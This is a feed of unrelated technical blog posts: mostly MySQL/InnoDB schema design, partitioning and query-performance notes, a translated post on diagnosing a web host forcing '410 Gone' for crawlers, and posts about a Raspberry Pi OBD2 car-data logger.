
That said, there are things that neither engine - and no relational db engine in the open-source world that I'm aware of - does very well:

1. Better handling of in-memory tables and in-memory indexes. One thing I built in DeviceSQL was an efficient in-memory hashed and ordered index over a persistent table. It was very popular with customers and extremely fast.
2. Fast bootup, even after ungraceful shutdown. Given that Serious Databases increasingly exist on small, portable devices, fast bootup is needed. Fast bootup has all sorts of implications for transaction handling, so it has to be "designed in" from the beginning.
3. An open storage architecture is a must, both for base storage and for indexes (and the open-storage architecture should allow index-organized base storage as well).
4. "Vector" index query answering facilities. One of the biggest limitations on relational database execution engines today is the inability to use multiple indexes on the same table. A "vector index strategy" would allow large tables to be searched by multiple parameters without needing to "pick a winner" (and often there aren't any good choices to pick...)
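To make point 4 concrete, here's a toy sketch (in Python, with invented names - no real engine exposes this API) of what a "vector index strategy" amounts to: each index answers its own predicate with a sorted list of row IDs, and the engine merge-intersects the lists instead of picking a single winning index.

```python
def index_scan(index, lo, hi):
    """Simulate a range scan on one (key, row_id) index:
    return the sorted row IDs whose key falls in [lo, hi]."""
    return sorted(row_id for key, row_id in index if lo <= key <= hi)

def intersect_sorted(a, b):
    """Merge-intersect two sorted row-ID lists in O(len(a) + len(b))."""
    out, i, j = [], 0, 0
    while i < len(a) and j < len(b):
        if a[i] == b[j]:
            out.append(a[i]); i += 1; j += 1
        elif a[i] < b[j]:
            i += 1
        else:
            j += 1
    return out

# Two single-column indexes on the same table, as (key, row_id) pairs.
city_idx = [(1, 10), (1, 11), (2, 12), (2, 13), (3, 14)]
rank_idx = [(5, 11), (6, 13), (7, 14), (9, 10)]

# WHERE city = 2 AND rank BETWEEN 5 AND 7, answered using BOTH indexes:
hits = intersect_sorted(index_scan(city_idx, 2, 2),
                        index_scan(rank_idx, 5, 7))
print(hits)  # [13]
```

No base-table row is touched until the intersection is complete, which is the point: selectivity compounds across indexes before any table access happens.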

More later...
          MySQL, Postgres, and InnoDB: Some Critiques of Index Organized Tables        
This discussion of InnoDB versus Postgres' storage engine (and index organized table structures generally, as this could also apply to Oracle's IOT's) is worth a careful read. Since our schema makes heavy use of the index organized property of InnoDB - and since I have a bit of a fanboy wish to use Postgres as I worked on it for a few years versus helping to buy Larry another yacht - here's some discussion of where index organized structures add value and some criticisms of my own.

Even though one uses a primary key definition to define the "index organization structure", in my opinion the real power of index organized table structures is in larger, "bulk" searches rather than the single-record lookups one would typically do with a primary key. Assuming very careful schema design and querying, the advantage with "bulk" searches is that a single B-tree ingress is all that is necessary to answer the search, while secondary indexes require at least some indirection into the table, which gets expensive if the working set involves millions of records (as it often does, at least in our case). See the below discussion on telemetry schemas for more.

Index Organized Table Wishlist

  1. Have an explicit "ORGANIZATION KEY" table declaration (or some such) and not rely on the PRIMARY KEY. If the organization key doesn't completely define the storage, allow "..." or something to allow for an incompletely defined organization key. If "ORGANIZATION KEY" is omitted, default to the PRIMARY KEY.
  2. Secondary indexes should have the option of using storage row-ids to "point at" the main rows as organization keys can be relatively long, and require walking two different B-trees to find the recs. Implementing this could be hard and make inserts slow as otherwise unchanged rows can "move around" while the B-tree is having stuff done to it - requiring secondary indexes to have pointers redone - so there's a design trade-off here. In our environment, we mostly avoid secondary indexes in favor of "search tables", which are basically user-managed indexes.
If I get the energy to do an open-source project, I want to do what I call "vector indexes" and a "vectoring execution engine" that we've basically implemented in user code in our app. If we had "vector indexes", we wouldn't be so reliant on index-organized table structures.
          The joy of MySQL stored procedures        
MySQL stored procedures, or stored functions, can be useful, particularly if you need to do something "iterative" with data that can't be easily done with "simple" SQL such as looping through data or (simple) XML or name-value-pair string parsing. First, a few things to know:

1. MySQL stored procedures are dynamically interpreted, so you won't hit syntax or semantic errors in logical blocks until they're actually executed, which means you need to create situations in unit testing where all logic is executed.

2. If stored procedure A calls stored procedure B, and B gets redefined, A will hang unless it gets redefined after B is redefined.

3. Local variables used with the "cursor FETCH" statement shouldn't have the same names as columns used in FETCH queries. If they do, they'll be NULL and random badness will ensue.

Debugging stored procedures

As far as I know, there's no source-level debugger available for MySQL stored procedures or functions, so you have to be a bit clever and a bit old-school in debugging.

The easiest way to debug stored procedures is a variation of the "printf" strategy from programming days of yore. Since you can't print an actual message, create a "debug_output" table with a "debug_txt varchar(128)" column, and use

insert into debug_output values (concat('my message', ',', 'var1=', var1, ..., 'varN=', varN));

After your procedure runs (or dies), just select from your debug_output table. I also like to create an error_output table for error handling with a single column.

Note that these will greatly impact runtime in tightly coded stored procedures, so you'll want to comment them out. I tried to disable them by using the "BLACKHOLE" storage manager, but this doesn't improve performance significantly.
          MySQL strings: oddness with backslash and LIKE        
Our application supports wildcard searches of the data, and the data occasionally includes LIKE "special" characters, such as '%', '_', and '\'. One thing we learned recently is that escaping a backslash - the default LIKE "escape character" - in a LIKE query is particularly troublesome.

Here are some examples, using a simple table foo with a single varchar column a:

> insert into foo (a) values ('\\');
> insert into foo (a) values ('\\%');

> select * from foo \G
a: '\'
a: '\%'

Now, do a LIKE search for a single backslash character without a wildcard. To get it matched, you need a total of four backslashes in the query string:

> select * from foo where a like '\\\\' \G
a: '\'

To do a LIKE search for a single backslash followed by a single "escaped" percent sign, you need six backslashes: four to match the backslash in the data, and two to escape the percent sign:

> select * from foo where a like '\\\\\\%' \G
a: '\%'

Note that if you use simple equality, you need two backslashes to search on a single backslash.
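Keeping the two layers of backslash interpretation straight (the string-literal parser consumes one level, LIKE consumes another) is easier if application code builds the pattern mechanically. A sketch - the helper name is mine, not a MySQL API:

```python
def mysql_like_literal(data: str) -> str:
    """Escape a literal string for use inside a MySQL LIKE pattern,
    producing the characters as they must appear in the SQL text.
    Two layers of interpretation apply: the string-literal parser
    halves the backslashes, then LIKE halves them again."""
    out = []
    for ch in data:
        if ch == '\\':
            out.append('\\' * 4)       # four backslashes in the SQL text
        elif ch in ('%', '_'):
            out.append('\\' * 2 + ch)  # two backslashes + the wildcard char
        else:
            out.append(ch)
    return ''.join(out)

# Matching the row holding a single backslash: four backslashes.
print(mysql_like_literal('\\'))    # \\\\
# Matching backslash-then-percent: six backslashes, then the percent sign.
print(mysql_like_literal('\\%'))   # \\\\\\%
```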
          Partition pruning and WHERE clauses        
If you're using lots of partitions, you'll want to make sure that partition pruning is used, and you aren't always guaranteed that it will be. We have a set of very large (potentially >1B rows, currently ~250M rows) tables that are partitioned on "Unix days" (Unix time rounded to days) and have several hundred partitions, using "hash" partitioning to simplify maintenance. So, to simplify, our table looks something like

create table mytable (id integer, unix_day mediumint, primary key (id, unix_day**)) engine=innodb partition by hash (unix_day) partitions 500;

Let's load it up with 1B records. Assuming even distribution, we'll have 2M records in each partition. Now, let's run the following query to fetch everything in the past 3 days (ignoring timezones for simplicity):

set @today = unix_timestamp(now()) div 86400;

select id from mytable
where unix_day >= @today - 3;

Since we're using "hash" partitioning, this will end up being a monster table scan on the entire table, taking hours to complete. The problem is this query can't be "pruned" because "hash" partitioning doesn't have an implied order.

However, if we run this query

select id from mytable where unix_day in (@today-3, @today - 2, @today - 1, @today);

we'll get good pruning and only four partitions will be searched. Note that MySQL is also good at exploding small integer ranges (ie, ranges less than the number of partitions) into what amounts to an IN-list for partition pruning purposes, so the above query, which is difficult to code in an app, can be converted to

select id from mytable where unix_day between @today - 3 and @today;

and only four partitions will be searched.

**Note that this "stupid" PRIMARY KEY declaration is necessary to have InnoDB let us use unix_day as a partition key, as partition keys must be part of an existing key (primary or otherwise). Making it a separate KEY - and additional index - would be hugely expensive and unnecessary in our app.
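Generating the IN-list from application code is mechanical. A Python sketch, reusing the mytable/unix_day names from the example above (it builds the predicate as a string for clarity; real code would pass the values as bind parameters):

```python
def unix_day_inlist(today: int, days_back: int) -> str:
    """Build a pruning-friendly IN-list predicate for a hash-partitioned
    unix_day column: one explicit value per day, oldest first."""
    days = ', '.join(str(today - d) for d in range(days_back, -1, -1))
    return f'unix_day IN ({days})'

today = 19000  # e.g. unix_timestamp(now()) div 86400, computed app-side
print(f'SELECT id FROM mytable WHERE {unix_day_inlist(today, 3)};')
```

Each listed value maps to exactly one hash partition, so the optimizer can prune the scan to those partitions alone.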
          InnoDB versus MyISAM: large load performance        
The conventional wisdom regarding InnoDB versus MyISAM is that InnoDB is faster in some contexts, but MyISAM is generally faster, particularly in large loads. However, we ran an experiment - a large bulk load of a mysqldump output file, which is basically plain SQL consisting of some CREATE TABLE and CREATE INDEX statements and a whole lot of huge INSERT statements - in which InnoDB was the clear winner over MyISAM.

We have a medium-sized database that we have to load every month or so. When loaded, the database is about 6GB in MyISAM, and about 11G in InnoDB, and has a couple hundred million smallish records. The MySQL dump file itself is about 5.6G, and had "ENGINE=MyISAM" in its CREATE TABLE statements that we "sed" substituted to "ENGINE=InnoDB" to do the InnoDB test.

Load time with ENGINE=MyISAM: 203 minutes (3 hours 23 minutes)
Load time with ENGINE=InnoDB: 40 minutes

My guess is that the performance difference is due to the fact that these tables have lots of indexes. Every table has a PRIMARY KEY, and at least one secondary index. InnoDB is generally better at large index loads than MyISAM in our experience, so the extra time MyISAM spends doing index population swamps its advantage in simple load time to the base table storage.

Given our experimental results, we'll now use InnoDB for this database.
          INNODB: When do partitions improve performance?        
PARTITIONs are one of the least understood tools in the database design toolkit.

Because InnoDB is an index-organized storage mechanism, its partitioning scheme can be extremely helpful for both insert/load performance and read performance in queries that leverage the partition key.

In InnoDB, the best way to think of a partitioned table is as a hash table with separate B-trees in the individual partitions, with the individual B-trees structured around the PRIMARY KEY (as is always the case with InnoDB-managed tables). The partition key is the "bucketizer" for the hash table.

Since the main performance issue in loading data into an InnoDB table is the need to figure out where to put new records in an existing B-Tree structure, a partition scheme that allows new data to go into "new" partitions, with "short" B-trees, will dramatically speed up performance. Also, the slowest loads will be bounded by the maximum size of an individual partition.

A partition scheme I generally like to use is one with several hundred partitions, driven by "Unix days" (ie, Unix time divided by 86400 seconds). Since data is typically obsoleted or archived away after a couple of years, this will allow at most a couple of days of data in a partition.

The partition key needs to be explicitly used in the WHERE clauses of queries in order to take advantage of partition pruning. Note that even if you can figure out how to derive the partition key from other data in the WHERE clause, the query optimizer often can't (or at least isn't coded to do so), so it's better to explicitly include it in the WHERE clause by itself, ANDed with the rest of the WHERE.

Some notes on using MySQL partitions:

1. Secondary indexes won't typically go much faster. Shorter B-trees will help some, but not all that much, particularly since it's hard to do both partition pruning and use a secondary index against the same table in a single query.
2. In MySQL, don't create a secondary index on the partition key, as it will effectively "hide" the partition key from MySQL and result in worse performance than if the partition is directly used.
3. Partitions can't be easily "nested". While you can use a computed expression to map your partition in more recent versions of MySQL, it is difficult for MySQL to leverage one well for the purposes of partition pruning. So, keeping your partitions simple and just using them directly in queries is preferable.
4. If you use "Unix day" as a partition, you'll want to explicitly include it in a query, even if you already have a datetime value in the query and the table. This may make queries look slightly ugly and redundant, but they'll run a lot faster.
5. The biggest "win" in searching from partitioning will be searches on the PRIMARY KEY that also use the partition key, allowing for partition pruning. Also, searches that otherwise would result in a table scan can at least do a "short" table scan only in the partitions of interest if the partition key is used in the query.
          MySQL 5.1 to 5.5 upgrade        
We are in the midst of a MySQL 5.1 to MySQL 5.5 upgrade. Nobody upgrades the database engine on a running production system without a Darn Good Reason, but we had recently run into one with a bug in MySQL 5.1 that was exploding MySQL RAM use on our production server and threatening to crash the production database.

Ultimately, the problem was we wanted to use "statement batching" with UPDATE, which produces a large number of UPDATE statements in a single long string, dramatically improving performance. After a dialog with MySQL's QA people, it turned out that we were hitting a bug in 5.1's query parser in which a lot of RAM was allocated for every statement, and not freed until the entire set of queries in the query text was parsed. So, this wasn't, strictly speaking, a "memory leak", but still an open-ended memory allocation which caused the RAM assigned to MySQL to grow enormously.

5.5 appears to have solved this problem, and we're well along in our acceptance process. Other than a couple of very small issues with syntax that was deprecated in 5.1 but is now an actual error in 5.5, all is going well. We'll go live shortly.

          MySQL: Fun with MySQL query logs        
The MySQL "general query log" is very useful when you're trying to understand, improve, or debug a large, complex app. The problem we often run into is that Hibernate logs, JBOSS logs, or other app-level logs miss queries or don't put constant data into queries, or the app itself has a bug in it that results in queries not being logged correctly or at all.

On the other hand, MySQL's "general query log" captures all queries sent to the server while the general_log system variable is set to 'ON'. A useful way to capture a particular application dialog is to run the app on a lightly-trafficked database instance, preferably an isolated test instance, enable the general log with

mysql> set global general_log = 'on';

quickly do your operation, and then disable the general log with

mysql> set global general_log = 'off';

After this, look at the log. It will have lines starting with a time, a connection ID, some sort of code indicating what happened, and the query text. Figure out which connection ID(s) are interesting, use "grep" on the log to get the lines belonging to the connection IDs of interest, and redirect this output into a SQL file. This can then be edited down to the actual queries (if you remember to put a semicolon at the end of every line), and you can make a simple script that can be run using mysql's shell-level tools.
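The grep-and-edit step can be scripted. A Python sketch, assuming a general-log line layout of date, time, connection ID, command, and argument; the exact columns vary across MySQL versions, so treat the parsing as illustrative:

```python
def extract_queries(log_lines, conn_id):
    """Pull the query text for one connection out of general-log lines
    shaped like: '<date> <time> <conn_id> <command> <argument>'.
    Appends a semicolon so the result can be replayed with the mysql client."""
    queries = []
    for line in log_lines:
        parts = line.split(None, 4)  # date, time, conn_id, command, argument
        if len(parts) == 5 and parts[2] == str(conn_id) and parts[3] == 'Query':
            queries.append(parts[4].rstrip(';') + ';')
    return queries

log = [
    '101112 10:00:01 42 Connect root@localhost',
    '101112 10:00:02 42 Query select * from foo',
    '101112 10:00:02 43 Query select * from bar',
    '101112 10:00:03 42 Quit',
]
print(extract_queries(log, 42))  # ['select * from foo;']
```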

These are very useful for debugging, benchmarking of the database accesses done by web or GUI-driven applications, or other SQL-based testing.

          PRIMARY KEYs in INNODB: Choose wisely        
PRIMARY KEYs in InnoDB are the primary structure used to organize data in a table. This means the choice of the PRIMARY KEY has a direct impact on performance, and for big datasets that impact can be enormous.

Consider a table with a primary search attribute such as "CITY", a secondary search attribute "RANK", and a third search attribute "DATE".

A simple "traditional" approach to this table would be something like

create table myinfo (city varchar(50),
rank float,
info_date timestamp,
id bigint,
primary key (id)
) engine=innodb;

create index lookup_index
on myinfo (city, rank, info_date);

InnoDB builds the primary table data store in a B-tree structure around "id", as it's the primary key. The index "lookup_index" contains index records for every record in the table, and the primary key of the record is stored as the "lookup key" for the index.

This may look OK at first glance, and will perform decently with up to a few million records. But consider how lookups on myinfo by a query like

select * from myinfo where city = 'San Jose' and rank between 5 and 10 and info_date > '2011-02-15';

are answered by MySQL:

1. First, the index B-tree is walked to find the records of interest in the index structure itself.
2. Now, for every record of interest, the entire "primary" B-tree is walked to fetch the actual record values.

This means that N+1 B-tree walks are needed for N result records.

Now consider the following change to the above table:

create table myinfo (city varchar(50),
rank float,
info_date timestamp,
id bigint,
primary key (city, rank, info_date, id)
) engine=innodb;

create index id_lookup on myinfo (id);

The primary key is now a four-column primary key, and since "id" is distinct, it satisfies the uniqueness requirements for primary keys. The above query now only has to walk a single B-tree to be completely answered. Note also that searches against CITY alone or CITY+RANK also benefit.

Let's plug in some numbers, and put 100M records into myinfo. Let's also say that an average search returns 5,000 records.

Schema 1: (Index lookup + Primary Key lookup from index):
Lg (100M) * 1 + 5000 * Lg (100M) = 132903 B-tree operations.

Schema 2: (Primary Key lookup only):
Lg(100M) * 1 = 26 B-tree operations. (Note that this single B-tree ingress operation will fetch 5K records)

So, for this query, Schema 2 is over 5,000 times faster than Schema 1. If Schema 2 is answered in a second, Schema 1 will take almost an hour and a half.
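The arithmetic behind those numbers, spelled out (the cost of one B-tree descent is taken as log base 2 of the row count, matching the estimates above):

```python
import math

N_ROWS = 100_000_000   # records in myinfo
RESULT = 5_000         # records returned by an average search

descent = math.log2(N_ROWS)   # ~26.6 comparisons per B-tree walk

# Schema 1: one index walk, plus one primary-key walk per result record.
schema1 = descent + RESULT * descent   # ~132,900 operations

# Schema 2: one primary-key walk fetches all 5,000 contiguous records.
schema2 = descent                      # ~27 operations

print(round(schema1 / schema2))  # 5001
```

The ratio is exactly 1 + 5,000 regardless of table size, which is where the "over 5,000 times faster" figure comes from.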

Note that we've played a bit of a trick here, and now lookups on "ID" are relatively expensive. But there are many situations where a table identifier is rarely or never looked up, yet is used as the primary key because "InnoDB needs a primary key".

See also Schema Design Matters

          Schema Design Matters        
One of the big "black holes" in software engineering is a lack of education and discussion of good, large-scale schema design. Virtually every blog you'll see on databases and performance focuses on tunable parameters and other operational issues, with occasional discussion on particular application-level database features.

This is obviously important, but while "tuning" will improve db performance (and a badly tuned database won't perform well at all), in many applications, the performance home runs are in schema issues.

Good schema design is hard, and in many ways counter-intuitive. To design a good large-scale schema, you'll need knowledge of how the database engine organizes data - so an excessively "abstract" approach is a problem - and you need to know what the applications will do with the schema. Simply representing the data and allowing the composition of "correct" queries is not enough.

And worrying about database normalization is far more trouble than it's worth; a large-scale schema will have to have "search" structures and "fact" or "base storage" structures.

An implication of the popularity of tools like Hadoop has been a tendency to walk away from the problem of general schema design, and focus on purpose-built search approaches that are intended to answer particular inquiries. This is necessary in data mining, but hinders more than helps the design of good, large-scale applications.

Much of the focus on schema design has been on "getting the right answer", which is obviously the zeroth requirement of a useful app, but if the queries effectively never return, are they producing the right answer?

In one of my jobs, I was, in a sense, hired due to this problem. The application was collapsing under the weight of input data, and was imperiling the growth of the company. I was actually hired to create a custom data manager for this application. However, as I looked at the database schemas, I realized that, while they were functional and "correct" schemas that were competently done from the perspective of "good" schema design, they were simply not up to the task of fetching the data that was needed to solve the business problem. In particular, if there were more than a few million entities in the database, the data browser app couldn't answer the sort of pseudo-ad-hoc inquiries users wanted to execute quickly enough to be viable.

Since writing this custom data manager would take at least a year - and the performance issues were hindering the growth of the company - I decided to table the custom data manager and deeply investigate and re-architect the schema design. The schema I came up with borrowed ideas from data warehousing, columnar databases, and Hadoop-style search-specific structures. I also minimized dependence on relational joins in favor of star-schema approaches to searching.

As it turned out, the schema redesign has made the application fast enough that the custom data manager is unnecessary.

The redesigned schema allows the app to currently handle over 100,000,000 entities (and about 2 billion database records), can probably handle at least 10x more, and is far faster than it originally was even with a couple million entities. And since we didn't have to throw hardware and software at the problem, the company's operational costs are very low given how much data (and business) is involved. And since we used MySQL, software costs are minimal.

A focus of this blog will be discussion of good schema design ideas, as well as operational issues around maintaining a good "live" schema.
          Doing star schemas in MySQL...        
One big problem in MySQL is that it can't do a native "star transformation" query. In practice, this means that only one index can be used for a given table in a search.

So, to do a star transformation, you have to jump through some hoops. These hoops may look silly, but they do work well, particularly for large tables (ie, more than 100M recs or so).

The problem is if you have a table that is to be searched in a relatively ad-hoc fashion, particularly if searched columns are ANDed together.

Let's say you have a table like

(id, searchcol1, searchcol2, searchcol3, ... searchcolN, datacol1, datacol2, ... datacolM) primary key (id);

A typical approach would be to create indexes on all the search cols and enumerate the searches in the WHERE clause. The MySQL query optimizer will pick an index for one of them and do simple qualifications on the rest of the searches. This means you have to hope that your most selective search column gets picked, and that it doesn't visit many rows, or your search performance will suck.

An alternate approach is to use "helper tables". These are standalone tables containing (id, searchcol[i], ...), with carefully constructed multi-value primary keys: searchcol as the first key column, your other standard searches as the other key components, and the ID as the last key component to guarantee uniqueness.

With helper tables, you do your individual searches into TEMPORARY tables containing only IDs, use INTERSECT-style logic (in MySQL, typically emulated with INNER JOINs between the temporary tables) to implement AND logic and UNION ALL to implement OR logic, and put the final result set into a final TEMPORARY table. After this, you can do the lookup on the big table to fetch the final answer.

In practice, this means you're using all indexed searches to "vector in" to the final result set. We've been able to get good "sort of" ad-hoc search performance with up to 500M records with the above approach.
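The pattern is easy to demonstrate in miniature with SQLite (which, unlike MySQL of this era, has a literal INTERSECT operator; in MySQL the AND step is usually written as an INNER JOIN between the temporary ID tables). A toy sketch with made-up table names:

```python
import sqlite3

db = sqlite3.connect(':memory:')
db.executescript('''
    CREATE TABLE big (id INTEGER PRIMARY KEY, data TEXT);
    -- One "helper table" (user-managed index) per search column,
    -- keyed (searchcol, id) so each search is an indexed range scan.
    CREATE TABLE h_color (color TEXT, id INTEGER, PRIMARY KEY (color, id));
    CREATE TABLE h_size  (size  TEXT, id INTEGER, PRIMARY KEY (size, id));

    INSERT INTO big VALUES (1,'rec1'),(2,'rec2'),(3,'rec3');
    INSERT INTO h_color VALUES ('red',1),('red',2),('blue',3);
    INSERT INTO h_size  VALUES ('big',2),('big',3),('small',1);

    -- AND logic: intersect the per-column ID sets into a temp table...
    CREATE TEMP TABLE hits AS
        SELECT id FROM h_color WHERE color = 'red'
        INTERSECT
        SELECT id FROM h_size WHERE size = 'big';
''')
# ...then fetch the final answer from the big table by ID.
rows = db.execute('SELECT b.data FROM big b JOIN hits USING (id)').fetchall()
print(rows)  # [('rec2',)]
```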
          Surprised by a case where a rental server's penalty forcibly returned "410 Gone"        

I was asked to look into a company site where "for the past few months, the site doesn't show up in Google search results at all."

  • Accessing with the user-agent name of a common PC or mobile browser returns HTTP status "200 OK" and the site can be browsed normally.
  • Accessing with any other user-agent name returns HTTP status "410 Gone" and nothing can be viewed at all.

Because of this, accesses from the user-agent names used by Google Bot and friends get "410 Gone". As a result, the site had been dropped from search results, and crawler traffic had plummeted.
At first I wondered whether a botched redirect rule in an .htaccess file was to blame, but the site didn't use an .htaccess file at all.




  • Forcibly return "410 Gone" to any non-human UA



Because this was done with no warning and no notice, we burned time on pointless trial and error: "the site stopped appearing in search results a few months ago" → "let me take a look... it's returning 410 Gone all over the place" → "I never configured anything like that" → "then where on earth is the cause?"

In the first place, HTTP has a status code that can express "unavailable due to high load": "503 Service Temporarily Unavailable". I think it would have been fine to just return that to everyone, regardless of who was accessing. (Or maybe the penalty includes a touch of consideration: "at least let the humans see the site"? ^^;)

A record of the trial and error spent hunting down why "410 Gone" was being forcibly returned (^_^;)


1. Check in Google Search Console whether the site is actually being crawled

When a site stops appearing in search results, the first thing to look at is Google Search Console. It tells you how often the crawler visits and pulls data, whether any errors are occurring, whether an SEO-related penalty has been imposed, and so on.
Looking at the "Crawl Stats" in this site's Google Search Console, it turned out that at some point a few months earlier the crawler had almost entirely stopped coming.

Crawl stats seen in Google Search Console (low) / Crawl stats (normal)

At first I wondered whether the search engine's crawler had simply given up because the site was responding too slowly, but...

2. Use Fetch As Google to see how Google Bot sees the site

The "Fetch As Google" feature inside Google Search Console shows you how Google Bot sees (renders) a web page.

The Fetch As Google status comes back as a "not found" error

Note: if you also send a rendering request from Fetch As Google, clicking the "Complete" entry shows the actual rendering result as an image. When the "not found" error occurs, though, the rendering result can't be viewed either.

The site displays fine in browsers such as IE, Edge, Firefox, and Chrome, yet "Fetch As Google" says it can't be found, so we couldn't tell how it looked to the crawler.

3. Change the user-agent name and access the site the way Google Bot does

To see directly how Google Bot views the site, I tried accessing it while impersonating Google Bot.
Specifically, I used Chrome's developer tools on Windows to change the browser's UA (user-agent) name to the one Google Bot uses, "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", and accessed the site.
Accessing while impersonating Google Bot returned a "410 Gone" error, as below.

Accessing as Google Bot returns 410 Gone

So it became clear that when Google Bot tries to access the site, as far as it can tell the content doesn't exist at all. The problem looked serious, and it fully explains the collapse in crawl frequency: HTTP status code 410 means "the content at this URL no longer exists (it is gone)". With "404 Not Found" there's still the possibility that "it vanished through some mistake" or "it was only removed temporarily", but deliberately returning "410 Gone" lets you infer that "the operator removed it intentionally".

But the site's branching logic was just "redirect if mobile, serve as-is otherwise", so there was nothing in it that would return 410 Gone only to Google Bot.

  • Even for a URL that doesn't exist, browsers used by humans get "404 Not Found" while Google Bot gets "410 Gone".
  • Even with a made-up user-agent name like "ABC123XYZ", "410 Gone" is always returned.

Since "410 Gone" comes back even when accessing a nonexistent URL, the problem looked like a web server configuration issue rather than a problem in the PHP source.
It also became clear that the server wasn't singling out Google Bot: it appeared to be returning "410 Gone" to everything other than "the common browsers used on PCs and mobile devices".

4. Examine the web server configuration

Digging around, I learned that there are cases where a mistaken redirect directive causes "410 Gone" to be returned.
Specifically, if you use a redirect directive but omit the redirect destination, it's apparently interpreted as "the destination no longer exists (it is gone)" and "410 Gone" is returned.

Now, the web server was Apache, so fiddling with HTTP status codes would be done through .htaccess files.
I expected to find an .htaccess file containing such a broken directive somewhere... but none turned up.

Looking at the web server's access logs, there were plenty of responses returning 410: to Google Bot, of course, and to Bing Bot as well.


5. A question to the rental server's support desk reveals a penalty!

  • Because it's a shared server, sites that put too much load on it are penalized by forcibly returning 410 to everything other than common browsers.
  • The penalty can be lifted once some kind of countermeasure has been taken.

So there are cases where the rental server company itself sets things up to return "410 Gone"...

Anyway, the moral of the story: I was surprised to learn there are rental server companies whose policy for overly heavy sites is to forcibly return "410 Gone" to block crawler access and thereby reduce traffic (load). ^^;



          Comment on Running Multiple MySQL Servers on FreeBSD by Jiří Kubrt        
Hi, this tutorial is very nice, but there is a problem with the socket, as it shares the same socket /tmp/mysql.sock with the first instance. So it is good to include socket=/tmp/mysql1.sock in my.cnf too...
          mysql table is marked as crashed and last (automatic?) repair failed        
In the MySQL logs I'm seeing the following error for the second time: Table './glpi/glpi_log/' is marked as crashed and last (automatic?) repair failed. If your MySQL process is running, stop it. On Debian: sudo service mysql stop. Go to your data ...
          Publishing My OBD2 Cloud Storage Architecture        

After working on the recent Pi based OBD2 logger, I've finally published the storage architecture. The OBD2 Cloud Storage project is on GitHub here:


This project contains the API and the MySQL database. The API is in PHP and uses JSON + REST. It connects to a local MySQL database to store all the OBD2 PID data, which a client device can log over the internet via the API calls. A Python SDK is also available on GitHub. I plan on adding SDKs in PHP and then Java (for Android) and Objective-C (for iPhones). The SDK is initially in Python because of pyobd, an open source OBD2 reader written in Python.

It feels great to let go and publish a project as open source. My day job is at a multi-billion dollar company writing in-house enterprise software. So it's freeing to write open source software for a change that I can share with the world.

          Playing with Pi        

A few months ago I decided to join the party and pick up a Raspberry Pi. It's a $25 full-fledged ARM-based computer the size of a credit card. There's also a $35 version, of which I ended up buying a handful so far. The low cost lets you dedicate a computer to applications where it otherwise wouldn't be justified or practical. Since then I've been poring over the different things people have done with their Pi. Here are some that interest me:

  • Setting up security cameras or other dedicated cameras like a traffic cam or bird feeder camera
  • RaspyFi - streaming music player
  • Offsite backup
  • Spotify server
  • Carputer - blackbox for your car
  • Dashcam for my car
  • Home alarm system
  • Digital signage for the family business
  • Console emulator for old school consoles
  • Grocery inventory tracker

Since the Pi runs an ARM based version of Linux, I'm already familiar with practically everything on that list. The OS I've loaded is Raspbian, a Debian variant. This makes it a lot easier to get up and running with.

After recently divesting myself of some large business responsibilities, I've had more personal time to dedicate to things like this. Add in the vacation I took during Christmas and New Years and I had the perfect recipe to dive head-first into a Pi project. What I chose was something that I've always wanted.

The database and Big Data lover in me wants data, lots of it. So I've gone with building a black box for my car that runs all the time the car is on, and logs as much data as I can capture. This includes:

  • OBD2
  • GPS
  • Dashcam
  • and more

Once you've got a daemon running and the inputs are being saved, the rest is all just inputs. It doesn't matter what it is. It's just input data.

My initial goal is to build a blackbox that constantly logs OBD2 data and stores it to a database. Looking around at what's out there for OBD2 software, I don't see anything that's built for long-term logging. All the software out there is meant for two use cases: 1) live monitoring, and 2) tuning the ECU to get more power out of the car. What I want is a third use case: long-term logging of all available OBD2 data to a database for analysis.

To store all this data I decided to build an OBD2 storage architecture comprising:

  • MySQL database
  • JSON + REST web services API
  • SDK that existing OBD2 software would use to store the data it's capturing
  • Wrapping up existing open source OBD2 capture data so it runs as a daemon on the Pi
  • Logging data to a local storage buffer, which then gets synced to the aforementioned cloud storage service when there's an internet connection.
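As a sketch of what the SDK-to-API contract might look like — the endpoint URL, field names, and function name here are my own invention for illustration, not the actual service:

```python
import json
import time

API_URL = "https://example.com/api/v1/log"  # hypothetical endpoint, not the real service


def build_log_payload(api_key, pid, value):
    """Package a single OBD2 reading as a JSON-ready dict for the REST API."""
    return {
        "api_key": api_key,     # issued when an email address is registered
        "pid": pid,             # e.g. "010C" is engine RPM in the OBD2 spec
        "value": value,
        "timestamp": time.time(),
    }


record = build_log_payload("demo-key", "010C", 2450)
body = json.dumps(record)  # this string is what would be POSTed to API_URL
```

In practice each payload would sit in the local buffer until the sync daemon POSTs it, so the timestamp has to be captured at logging time, not upload time.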

Right now I'm just doing this for myself. But I'm also reaching out to developers of OBD2 software to gauge interest in adding this storage service to their work. In addition to the storage, an API can be added for reading the data back, such as pulling DTC (diagnostic trouble) codes, getting trends and summary data, and more.

The first SDK I wrote was in Python. It's available on GitHub. It includes API calls to register an email address to get an API key. After that, there are some simple logging functions to save a single PID (OBD2 data point such as RPM or engine temp). Since this has to run without an internet connection I've implemented a buffer. The SDK writes to a buffer in local storage and when there's any internet connection a background sync daemon pulls data off the buffer, sends it to the API and removes the item from the buffer. Since this is all JSON data and very simple key:value data I've gone with a NoSQL approach and used MongoDB for the buffer.
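A minimal sketch of that buffer-and-sync pattern, using an in-memory SQLite table in place of MongoDB purely to keep the example self-contained (the function names are illustrative, not the real SDK's):

```python
import json
import sqlite3
import time

# Local buffer standing in for MongoDB in this sketch: one row per queued reading.
buf = sqlite3.connect(":memory:")
buf.execute("CREATE TABLE buffer (id INTEGER PRIMARY KEY, payload TEXT)")


def log_pid(pid, value):
    """SDK side: always write to the local buffer, never straight to the API."""
    payload = json.dumps({"pid": pid, "value": value, "ts": time.time()})
    buf.execute("INSERT INTO buffer (payload) VALUES (?)", (payload,))


def sync_once(send):
    """Daemon side: drain the buffer, deleting each item only after a successful send."""
    sent = 0
    for row_id, payload in buf.execute("SELECT id, payload FROM buffer").fetchall():
        if send(payload):  # in real life: an HTTP POST to the API
            buf.execute("DELETE FROM buffer WHERE id = ?", (row_id,))
            sent += 1
    return sent


log_pid("010C", 2450)   # engine RPM
log_pid("0105", 88)     # coolant temperature
sync_once(lambda payload: True)  # pretend the upload succeeded
```

The key property is that a failed upload leaves the row in the buffer, so nothing is lost while the car is out of coverage.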

